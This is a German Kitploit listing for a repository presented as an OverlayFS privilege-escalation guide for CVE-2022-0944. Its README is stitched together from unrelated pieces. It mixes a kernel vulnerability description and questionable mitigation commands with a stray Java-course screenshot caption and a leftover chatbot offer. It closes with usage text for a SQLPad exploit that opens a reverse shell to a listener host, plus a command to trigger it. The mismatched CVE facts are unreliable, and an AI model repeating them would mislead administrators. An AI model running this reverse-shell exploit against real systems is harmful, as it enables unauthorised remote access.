Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
OverlayFS-PrivEsc-CVE-2022-0944 — Anleitung zur Ausnutzung und Behebung von CVE-2022-0944, einer Linux-Kernel-Privilegieneskalations-Schwachstelle in OverlayFS, mit Erkennungsskripten und Patch-Anweisungen. | Kitploit
Tools/GitHubGitHub/artemisxxx37/overlayfs-privesc-cve-2022-0944
Privilege EscalationSchwachstellenanalyseExploitationLernen & Bildung
GitHubartemisxxx37/overlayfs-privesc-cve-2022-0944

OverlayFS-PrivEsc-CVE-2022-0944

Anleitung zur Ausnutzung und Behebung von CVE-2022-0944, einer Linux-Kernel-Privilegieneskalations-Schwachstelle in OverlayFS, mit Erkennungsskripten und Patch-Anweisungen.

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
1vor 1 JahrNoch nicht geprüft

CVE-2022-0944: Privilege-Eskalations-Schwachstelle in OverlayFS 🛡️

CVE Severity

Sicherheitshinweis und Anleitung zur Schadensbegrenzung für die Privilege-Escalation-Schwachstelle im OverlayFS des Linux-Kernels.

📜 Übersicht

CVE-2022-0944 ist eine Sicherheitsschwachstelle im OverlayFS-Subsystem des Linux-Kernels, die es lokalen Angreifern ermöglicht, durch unsachgemäße Handhabung der Dateierstellung in bestimmten Konfigurationen Berechtigungen zu eskalieren.

📌 Technische Details

Screenshot 2025-03-26 at 17-15-46 i got published a course for java for beginners unfortunally i don't have a redame file to guide through

🚨 Auswirkungen

Ein lokaler Angreifer könnte:

  • Root-Rechte durch manipulierte Dateioperationen erlangen
  • Sicherheitsbeschränkungen umgehen
  • Sensitive Systemdateien ändern
  • Die Integrität des gesamten Systems gefährden

🔍 Erkennung

  1. Kernel-Version überprüfen uname -r

Betroffene Versionen: 5.8 <= Kernel < 5.16.12

  1. OverlayFS-Nutzung überprüfen mount | grep overlay

Systeme mit OverlayFS-Mounts sind gefährdet

  1. Sicherheitshinweise prüfen

Für Debian/Ubuntu:

root@kitploit:~
grep CVE-2022-0944 /var/log/apt/history.log

# Für RHEL/CentOS:
rpm -q --changelog kernel | grep CVE-2022-0944

4.🛡️ Schadensbegrenzung

Offizielle Patches

Aktualisieren Sie auf eine dieser gepatchten Versionen:

  • Linux Kernel 5.16.12 oder neuer
  • Herstellerspezifische Backport-Patches

Befehl zum Aktualisieren:

Ubuntu/Debian

sudo apt update && sudo apt upgrade linux-image-$(uname -r)

RHEL/CentOS

sudo yum update kernel

Umgehungen (falls kein sofortiger Patch verfügbar)

  • OverlayFS-Nutzung einschränken: sudo modprobe -r overlay

  • Namespace-Einschränkungen implementieren: # Erstelle unprivilegierten Benutzer-Namespace unshare -Ur

    root@kitploit:~
      # Mounten mit Benutzereinschränkungen
      mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt
    
  • SELinux/AppArmor-Richtlinien anwenden: type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }

⚠️ Haftungsausschluss Dieses Dokument dient nur zu Informationszwecken. Es wurde versucht, die Genauigkeit zu gewährleisten, es wird jedoch keine Garantie übernommen. Testen Sie Patches immer zuerst in einer Entwicklungsumgebung, bevor Sie sie in der Produktion einsetzen.

Letzte Aktualisierung: 2023-10-01 | Changelog anzeigen

Hauptmerkmale:

  1. Klare Schwachstellenklassifizierung mit Sicherheitsbadges
  2. Kurzübersicht technischer Details in Tabellenform
  3. Umsetzbare Erkennungs- und Abhilfeschritte
  4. Herstellerspezifische Aktualisierungsbefehle
  5. Beispiele für Sicherheitsrichtlinien (SELinux/AppArmor)
  6. Offizielle Referenzlinks
  7. Einhaltung der Standards für die Offenlegung von Schwachstellen

Dieses README-Format ist geeignet für:

  • Sicherheitsteams
  • Systemadministratoren
  • DevOps-Ingenieure
  • Open-Source-Maintainer
  • Schwachstellendatenbanken

Möchten Sie, dass ich:

  1. Spezifische Hersteller-Patch-Informationen hinzufüge?
  2. Exploit-Proof-of-Concept-Details (mit Vorsicht) einfüge?
  3. Weitere Erkennungsskripte hinzufüge?
  4. Für eine bestimmte Linux-Distribution anpasse?

Verwendung

root@kitploit:~
usage: main.py [-h] url lhost lport [username] [password]

positional arguments:
  url         URL zu SQLPad
  lhost       Listener-Host-Adresse für Reverse Shell
  lport       Listener-Port für Reverse Shell
  username    Anmeldename (optional)
  password    Anmeldekennwort (optional)

options:
  -h, --help  Zeigt diese Hilfemeldung an und beendet das Programm.

Beispiel:

root@kitploit:~
# Abhängigkeiten installieren
pip install -r requirements.txt

# SQLPad-Docker-Container starten
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0

# Exploit auslösen
./main.py http://localhost:3000 127.0.0.1 1337 admin admin

Haftungsausschluss

Dieses Repository enthält Code und Werkzeuge, die ausschließlich zu Bildungszwecken bestimmt sind, insbesondere für die Verwendung in Cybersicherheitskursen und Lernumgebungen. Der Autor dieses Codes übernimmt keine Verantwortung für Folgen, die aus der Nutzung, dem Missbrauch oder der Änderung dieses Codes entstehen. Der Code wird "wie besehen" ohne jegliche Gewährleistung, weder ausdrücklich noch implizit, bereitgestellt, einschließlich, aber nicht beschränkt auf die stillschweigenden Gewährleistungen der Marktgängigkeit oder der Eignung für einen bestimmten Zweck.

Tool herunterladen